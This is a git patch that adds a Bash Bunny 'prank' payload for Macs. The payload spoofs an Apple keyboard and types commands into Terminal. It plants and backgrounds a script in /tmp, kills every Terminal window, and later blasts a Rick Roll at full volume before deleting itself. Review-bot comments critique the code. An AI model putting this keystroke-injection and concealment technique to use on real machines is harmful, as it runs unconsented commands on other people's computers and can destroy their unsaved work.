From 2c9b668bfad72490e07f67023c0e8c91b2228620 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Sun, 10 Sep 2023 13:40:44 +0200 Subject: [PATCH] Add SleepyMacRick MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered. --- .../library/prank/SleepyMacRick/README.md | 17 +++++++++++++ .../library/prank/SleepyMacRick/payload.txt | 25 +++++++++++++++++++ payloads/library/prank/SleepyMacRick/rick.sh | 14 +++++++++++ 3 files changed, 56 insertions(+) create mode 100644 payloads/library/prank/SleepyMacRick/README.md create mode 100644 payloads/library/prank/SleepyMacRick/payload.txt create mode 100644 payloads/library/prank/SleepyMacRick/rick.sh diff --git a/payloads/library/prank/SleepyMacRick/README.md b/payloads/library/prank/SleepyMacRick/README.md new file mode 100644 index 00000000..ff8ada4c --- /dev/null +++ b/payloads/library/prank/SleepyMacRick/README.md @@ -0,0 +1,17 @@ +# SleepyMacRick +* Author: 90N45 +* Version: 1.0 +* Target: Mac +* Attackmodes: HID, STORAGE + +### Description +Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered. + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE | +| Yellow single blink (ATTACK) | Setup and run script on the Mac | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity | + +*Average runtime: 23 seconds* \ No newline at end of file diff --git a/payloads/library/prank/SleepyMacRick/payload.txt b/payloads/library/prank/SleepyMacRick/payload.txt new file mode 100644 index 00000000..be19ac7d --- /dev/null +++ b/payloads/library/prank/SleepyMacRick/payload.txt 
@@ -0,0 +1,25 @@ +#!/bin/bash + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE + +LED ATTACK +# Open terminal +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 1500 + +QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh" +QUACK ENTER +QUACK DELAY 1000 + +QUACK STRING "diskutil eject /Volumes/BashBunny/" +QUACK ENTER +QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &" +QUACK ENTER +QUACK STRING "killall Terminal" +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/SleepyMacRick/rick.sh b/payloads/library/prank/SleepyMacRick/rick.sh new file mode 100644 index 00000000..3c9af0a5 --- /dev/null +++ b/payloads/library/prank/SleepyMacRick/rick.sh @@ -0,0 +1,14 @@ +#! /bin/bash + +sleep 3 +inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') + +while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do + sleep 0.5 +done + +osascript -e "set volume output volume 100" +open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0" + +# Self destruct +rm /tmp/rick.sh \ No newline at end of file
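Review bot: the README's Description says the script reacts to "user activity", but the loop in rick.sh only compares the name of the frontmost process, so the trigger is an application switch; the Description should say that. The README also omits side effects that are visible in the other two files: payload.txt presents the device with `VID_0X05AC PID_0X021E` and runs `killall Terminal`, and rick.sh sets the output volume to 100 without restoring it. A short "Side effects and cleanup" section listing these, and noting that /tmp/rick.sh stays on disk until the trigger fires, would let anyone running or investigating this know what to expect. All three new files also end without a trailing newline.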
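Review bot: `QUACK STRING "killall Terminal"` at the end of payload.txt terminates every Terminal window and tab the user has open, not only the one this payload opened, so unrelated running sessions and unsaved work in them are lost. Please close only the window the payload itself opened (typing `exit` into it, for example) instead of killing the whole application, and mention the behaviour in the README if it stays.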
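Review bot: the `while [[ ${inactive} = $(osascript ...) ]]` loop in rick.sh has no upper bound, and the `rm /tmp/rick.sh` under "# Self destruct" is only reached after the loop exits. If the frontmost application never changes, the background process keeps spawning osascript every 0.5 seconds and the file stays in /tmp indefinitely. Please add a maximum wait after which the script exits, and move the removal into a `trap ... EXIT` so it runs on every exit path. Two smaller points in the same file: the right-hand side of `=` inside `[[ ]]` is unquoted and is therefore matched as a pattern, so it should be wrapped in double quotes to compare names literally; and `set volume output volume 100` changes a user setting that is never restored, which should at least be documented.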